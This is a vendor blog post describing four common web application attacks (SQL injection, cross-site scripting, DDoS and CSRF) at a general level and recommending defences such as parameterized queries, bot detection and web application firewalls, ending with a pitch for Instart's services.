4 Common Web Application Security Attacks and What You can Do to Prevent Them
Anyone who operates a website should be concerned about security, especially the security of your sensitive customer information - this much should be obvious to you by now. However, unless you keep an ear to the ground about security news, it is often only the most high profile or sophisticated attacks that you actually hear about. The reality is that common, low level attacks are executed every single day against websites and web applications. The good news is these types of attacks are preventable with the right preparation.
What motivates hackers?
If you store sensitive user information in your database, users expect you to keep their information confidential. However, chances are right at this moment hackers are poking around your website to find a vulnerability to exploit. What are some of the motivations attackers might have?
- Financial gains - Fraud, theft, stealing and then selling personal information
- Disruption - preventing other people from accessing systems, distributing false information
- Notoriety - pulling off breaches that are extremely difficult or accessing secure systems
What makes an application a target?
Different web applications have different functions and purposes, but all applications can be a target for hackers. What makes an application a target
- Popularity – If you have a popular website, you get a great number of visits every second. You probably have many competitors too, and damage to your brand can help a competitor. Your website’s performance and availability is one of the main advantages you have over all the others. Attacks on popular websites also tend to be more newsworthy if the hacker is looking for notoriety.
- Protest/Politics – groups like Anonymous orchestrate attacks on government, religious and corporate websites for fun or to make a statement.
- Disgruntled employees – not all attacks are from the outside, often times attacks are orchestrated or assisted with the help of somebody on the inside.
What are the 4 most common attacks?
Hackers have a lot of choices for attack vectors, but here are the 4 most common things they try first:
- Carry out SQL injection attacks to gain access to the database, spoof a user’s identity, and destroy or alter data in the database. SQL injection occurs when malicious SQL statements are inserted into form fields to try and gather information from the database. This information enables the hacker to access, modify or destroy information in the database. With SQL injection, a hacker can change the price of a product, and gain customer information such as credit cards numbers, passwords and contact information.
- Use Cross-Site Scripting (XSS) attacks to send malicious code to other users of the website by injecting code into the application that then executes on the client side for other users. These attacks can lead to your customers being infected with malware, having their sensitive information stolen, or even having their computer be recruited into large botnets.
- Make the site temporarily unavailable with a Distributed Denial of Service Attacks (DDoS). DDoS attacks generate requests from thousands of IP addresses in an attempt to flood a site with traffic, making it impossible for the server to respond to requests. DDoS attacks can slow a site down or make it temporarily unavailable.
- Hijack trusted user sessions to make unwanted purchases on behalf of users with Cross Site Request Forgery (CSRF) attacks. CSRF attacks occur when a user is tricked into clicking a link or downloading a compromised file that executes unwanted or unknown actions on an authenticated user session.
How should you protect your assets and users?
There are different methods and tools that modern web application developers use to protect their website. There are solutions that exist for specific attacks, and best practices that can be used on an on-going basis to protect your applications and users. Code reviews, bug bounty programs and code scanners should be implemented throughout the application lifecycle. Code reviews can help spot vulnerable code early in the development phase, dynamic and static code scanners can do automatic checks for vulnerabilities, and bug bounty programs enable professional pen testers to find bugs in the website.Even with these best practices in place, you may still find yourself under attack.
Even with these best practices in place, you may still find yourself under attack.
Attack-specific solutions include:
- Using prepared statements with parameterized queries. This ensures that the SQL code is defined first and then the queries are passed later. The effect is that the database can differentiate between SQL code and SQL data. This means that the code is not vulnerable to SQL injection attempts because the query is not vulnerable to an attackers tampering.
- Implementing bot detection and mitigation capabilities to prevent bad bots from accessing your application data. This ensures that a form being submitted or request being made is actually by a human and not a bot impersonating a human.
- Use a Web Application Firewall (WAF) to monitor your network and block potential attacks
None of these methods can replace the others – it is important to follow the ‘defense in depth’ methodology and deploy many independent, overlapping layers of security. Although no system can be completely safe, being prepared for the most common types of attacks should be a bare minimum for your organization. For more help and information on securing your websites and applications from all types of attacks, please feel free to contact us. Instart provides comprehensive application protection for your cloud, web, and mobile applications.